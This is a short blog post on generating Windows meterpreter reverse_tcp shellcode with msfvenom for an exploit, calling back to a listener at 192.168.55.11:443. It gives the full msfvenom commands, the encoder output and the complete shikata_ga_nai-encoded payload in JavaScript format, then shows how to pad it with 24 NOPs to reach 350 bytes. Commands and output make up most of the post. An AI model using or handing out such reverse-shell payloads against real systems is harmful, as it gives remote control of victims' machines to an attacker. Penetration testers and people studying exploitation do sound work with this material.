msfvenom -- Specific Byte Count

by Vince
in Blog
Hits: 2593

I wanted to generate some shell code for an exploit and I used the following command:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.55.11 LPORT=443 -f js_le -b "\x00\x0a\x0d"

The output:

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326

Payload size: 326 bytes

%uf7b8%u0ca4%ud94b%ud9d0%u2474%u5af4%uc929%u4bb1%u4231%u0315%u1542%uea83%ue2fc%u5802%uc9e4%ua1ec%uadf5%u4465%uedc4%u0c11%ude77%u4052%u9574%u7136%udb0f%u769e%u56b8%ub9f8%uca39%udb38%u11b9%u3b6c%ud983%u3a61%u04c4%u6e8b%u439d%u9f39%u1eaa%u1481%u8fe0%uc981%uaeb1%u5fa0%ue8c9%u6162%u811e%u792b%uac43%uf2e2%u5ab7%ud2f5%ua389%u1b59%u5626%u5ba0%u8981%u95d7%u34f1%u61ef%ue28b%u727a%u602b%u5edc%ua5cd%u15ba%u02c1%u72c9%u95c6%u091e%u1ef2%udea1%u6472%ufa85%u3edf%u5ba4%u91ba%ubcd9%u4d65%ub67f%u9a88%u95f2%u6fc4%u263e%uf815%u5549%ua727%uf1e1%u200b%u052f%u1b6b%u9997%ua492%ub0e7%uf050%uaab7%u7971%u2b5c%uac7d%u7bf2%u1fd1%u2bb2%ucf91%u265a%u2f1e%u497a%u58f4%ub310%ua69f%u8c4c%u4f54%uf38e%u346b%u1507%u5a01%u8d41%uc3be%u45c8%u0b5e%u23c7%u8760%ud4ed%u602f%uc684%u4f58%u1766%uda99%u7d66%u4c9d%ue931%ua99f%ub675%u9c60%ub106%u619f%uc9e1%uf796%ua5b1%u17d6%u3631%u7d81%u5e31%u2675%u7b62%uf37a%ud017%ufcef%u8441%u94b8%uf36f%u3a8f%ud690%u3d93%ua76e%ubc50%u7ead%uca91%u42d8%uc5a6%ue7af%u4f8f%ub4cf%u45d0

After reading the fine print in the exploit, I noticed the author suggested keeping the byte count the same.  The original byte count, 350 bytes.  We can modify our original statement by adding some nops (No Operation -- essentially filler that does nothing).  Our revised statement looks like:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.55.11 LPORT=443 -f js_le -n 24 -b "\x00\x0a\x0d"

The revised payload size:  Payload size: 350 bytes

Breaking it down --

-a = architecture
-p = platform
-f = format
-n = nops
-b = bad characters

326 bytes + 24 nops = 350 bytes